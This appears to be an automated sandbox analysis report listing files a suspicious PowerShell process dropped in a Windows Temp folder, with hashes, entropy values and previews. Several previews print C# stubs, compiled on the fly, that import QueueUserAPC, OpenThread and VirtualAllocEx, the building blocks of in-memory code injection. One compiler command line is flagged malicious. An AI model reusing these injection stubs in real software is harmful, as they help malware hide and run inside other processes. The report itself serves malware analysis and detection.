                                                          SSDEEP:24:3aEPpQrLAo4KAxCoOu42B15qRPNnCvK39tOBPnKdirh:qEPerB4BOu/9qRVnCvO9tOBfuit
                                                          MD5:D9D42CC091BE79AB1496C649F5585767
                                                          SHA1:5E23D29ACD70EE17F01DA4AB54BE562E33CC7980
                                                          SHA-256:5C0BFCE56791BB95902AF0280D2DED2FB46EEA5899AB08CB4A0955ABE86F08EA
                                                          SHA-512:6B962EDA66C17B5F531F6370C3B4567AC0CD23EE2F140B9352C4C178115C7E54CA456644D200E888AFF1A67D038E9605C8557B272377E99C2358FB856C67CFE0
                                                          Malicious:false
                                                          Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                          C:\Users\user\AppData\Local\Temp\380E.bi1
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):11
                                                          Entropy (8bit):1.2776134368191157
                                                          Encrypted:false
                                                          SSDEEP:3:111Qv:Luv
                                                          MD5:5B3345909519932D6670D92F16496463
                                                          SHA1:6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
                                                          SHA-256:0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
                                                          SHA-512:B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
                                                          Malicious:false
                                                          Preview: -------- ..
                                                          C:\Users\user\AppData\Local\Temp\RES20A.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.707958824120458
                                                          Encrypted:false
                                                          SSDEEP:24:p+fpt6nfHuhKdNfI+ycuZhNbWakSyHPNnq9qp0e9Ep:cOfkKd91ulqa3+q9H
                                                          MD5:9F22A8320D7A071B76FDC69EC539ECCB
                                                          SHA1:14333BA5399DAD87A67A7C9A7AFEB8740FCFEECE
                                                          SHA-256:9394AC09F500EBF590CEF7AA960C5BA829D34107A3156FD9258CB42DB78240DB
                                                          SHA-512:615184C6FB055548483C213F1B47960804AED79DC425C4387446B496D2C6948196D17408F2013694B44711163F2881F878BBAAF2AE292EDDD0BFF10711287AC9
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP..................<..)..,7@G.Z...........3.......C:\Users\user\AppData\Local\Temp\RES20A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RES47B.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.7147512751024414
                                                          Encrypted:false
                                                          SSDEEP:24:p+fqnfHuhKdNfI+ycuZhNRakSfPNnq9qpxe9Ep:cqfkKd91ulRa39q9e
                                                          MD5:56C427E4F156501570F09F60C71B4FFC
                                                          SHA1:E95259B5A9D2A7D6985794796C7D50E44F2ED54E
                                                          SHA-256:0DF94A4553794E9745768309E3143BF27364A91D236F4B7B3078172745404A9D
                                                          SHA-512:4DF6DE36B39C6AE6F8ECD8ACC31EEB1659FB4C75981086D5BD9D89560F7D7EAE4EE946E0E07BEC9F8095F15BA16CAB2679D500EB40C959B0452B3482FCBA76F8
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP........................x.7.............3.......C:\Users\user\AppData\Local\Temp\RES47B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESF604.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.704757091617058
                                                          Encrypted:false
                                                          SSDEEP:24:bZfF7LDfHvV0QhKdNNI+ycuZhNkqakS1bPNnq9qp1e9Ep:bBptdKd31ul3a37q9a
                                                          MD5:A19900A27924406D8B8C2B3967F7549E
                                                          SHA1:67086C00C8F2AD154A30F03F3B7B7FCC5CCA26AB
                                                          SHA-256:B10D3F322BEEB34F99285BE39628DEB06F88269B1C71D5AB201C1D4C873107B6
                                                          SHA-512:B24F2FA68DDBDDB024C3439363F240E98390EEC262BF791B83F9E032429B41F9610641EAD8BE66589E698765AE895B07D4CAD7324583854FBD7F363B7AB41818
                                                          Malicious:false
                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP................|VQh..|.8.r...............4.......C:\Users\user\AppData\Local\Temp\RESF604.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESF652.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.702279321283148
                                                          Encrypted:false
                                                          SSDEEP:24:p+fiijCDfHv6hKdNNI+ycuZhNxakSPPNnq9qp1e9Ep:ct44Kd31ulxa3Nq9a
                                                          MD5:68F64E91D72B2B0F972BCD7336F2A9CC
                                                          SHA1:2B4DA3BF145E15313E6796912E46193EC0CB0542
                                                          SHA-256:5AEBE77361A5E69CD2F4E5A7FD83CE17FEEFEFBC6C29E429A92471903DE78A00
                                                          SHA-512:7D6DD472E15D32B947CD7C7CC98073D00E05FAD1397E0B5BF4A00280DD0C9729F1B9783E8713C429AD221C12C1C76867E6EED624A266467D2C180868C97CF8A2
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP................N0........].=............4.......C:\Users\user\AppData\Local\Temp\RESF652.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1khnqhjk.loo.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psahr3sw.wpu.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tg4p345c.j2l.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1118070987658872
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuqak7Ynqq1bPN5Dlq5J:+RI+ycuZhNkqakS1bPNnqX
                                                          MD5:7C5651680CDC7C8F38DD72F6EFF7FCC1
                                                          SHA1:48F3B58D5CF23B80248D1220D2781699720AB0FC
                                                          SHA-256:5E443A37A5A1A69715E0C8D1C58A98CB0CEDAB7B9F9CF4F043FC43A37F4A2155
                                                          SHA-512:009D6016851CEC3F44A2664E385461C377E9179517BB89707B0C47093C358D583FD0E08367FF693CDC6B6B84DFF7F2E7D4DEBB4BAFB1003228945811C467985A
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.5.2.a.c.u.f.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.5.2.a.c.u.f.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.249748564356388
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftqhzxs7+AEszIwkn23ftqq9:p37Lvkmb6KRfFqhWZEifFqq9
                                                          MD5:1F903E4C6488F96BEFF8106212BB1FB8
                                                          SHA1:F83BA87CDA88445647CBC5287FEB88FB745303D9
                                                          SHA-256:9AE5B2762E43566A26D39530831229138A3DE4407243A22BF1CACA6DDC8C5EC1
                                                          SHA-512:72685413AF01FC6EFF547B0E3F7A18A2F3FA655FCF33566E7EA1368A9684DB674AFACD57FC30F1D010B54C0D1991A1CE1A079A0CBB84ADB231546E382457E871
                                                          Malicious:true
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.597551467700443
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpi94MatkZfltUaUI+ycuZhNkqakS1bPNnq:6XDWb5lxF1hJl61ul3a37q
                                                          MD5:C46F8C61C8CB705DF757CCCA39C5B679
                                                          SHA1:AF738C88BB2A7C2CF9D18F0A68179DCE724C13D7
                                                          SHA-256:DD862D783A4E8A31034B21655E7F80366CF2A745E821AB0E4D7EB0DD2749D3E2
                                                          SHA-512:9938809F33099A04070BC942239CF9C48B2F99CD2E7D77851939AEB1FA9A5DF6DCA46F7FF584E4183BC7ACEB2BFB7C88B3747ACE7ABC5A9481DA678590D01F9E
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.a52acufz.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0863679805822777
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBVak7Ynqq4aPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                          MD5:A84E3090E4FC8017918EF55DA63D009A
                                                          SHA1:E15976679755FDC7CC21F13701703C98E72E7187
                                                          SHA-256:6CD9F5821875D9A6795771EEC4553888DCAEED39D713D8AAFD886594B22CDAC3
                                                          SHA-512:0BCECD1BFFAA5F7AAF3C1A402AAFF92770676B19B91A2EF3F785FB58F2993B9BAC01A55B3E39AEF19B43928ED008D1C468A0518CAD499E2E3C24AE14128E28AE
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.22823213171567
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fx1CokCLGzxs7+AEszIwkn23fx1CokC:p37Lvkmb6KRfZ1jkHWZEifZ1jkC
                                                          MD5:FA407420BBC7FCEC54DFA5F57B2D7BFB
                                                          SHA1:5964FDCA13AB3C97EE75C4D5D15DEA6ED75A6FDC
                                                          SHA-256:E30540BE2C4911E47BBDF06B9F3DB165CD98DD7A4D77D028767C546DC3B50342
                                                          SHA-512:DE73CCC9D3540D976AA4E27DCA7ABA5D44DC8ABBA0810229DF904B1C52D51EA84AE908487E61E4C5E29B78546634DC52BBFFE3CE15052611093048A77A896307
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.590972462431772
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpiea4MatkZf28zaUI+ycuZhNxakSPPNnq:6XDWb5lxF11JVr1ulxa3Nq
                                                          MD5:2C829AD936178D4534050E2CF39B3F90
                                                          SHA1:5096E288CE9F5699BB3BB57930ED2B749692CA5B
                                                          SHA-256:E7ACFB204936BB5A36A6E11EC33A50BE09C01CF0104A556C03247B227F590B37
                                                          SHA-512:CD552B4F18D42DAB7B5E63FAE29715C3518CC9B26FB7DD08D12FFD1416585E734E650F8E5228C3E6F0115FC9A84BCE3ED9136A79CC2C2FBA204DF9E5B572EC0D
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.aixojixg.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1040997079419537
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRWak7YnqqyHPN5Dlq5J:+RI+ycuZhNbWakSyHPNnqX
                                                          MD5:9907C63C948829AE092C374047EE5A7F
                                                          SHA1:16272A7ED54545B9C5EB9DB21BAF114DBBEBA3F6
                                                          SHA-256:67EDC019440BEAB697297DA6152E19A52C0FE9B6E19A60C6CE235A60C7ECC9A4
                                                          SHA-512:B4D72964DF5A8CFC8CFAA248BD4F05F6C578EF47CEBFBD240AE15E3123088CE88CFFD212265D836A2B3EB6784762CDBDA5AEE08C13FC77F38C3807E61C6EAF16
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.260808918395778
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fpvJUzxs7+AEszIwkn23fpF9:p37Lvkmb6KRfhv+WZEifhr
                                                          MD5:0330280B07D13A01DEC77E2EDC601878
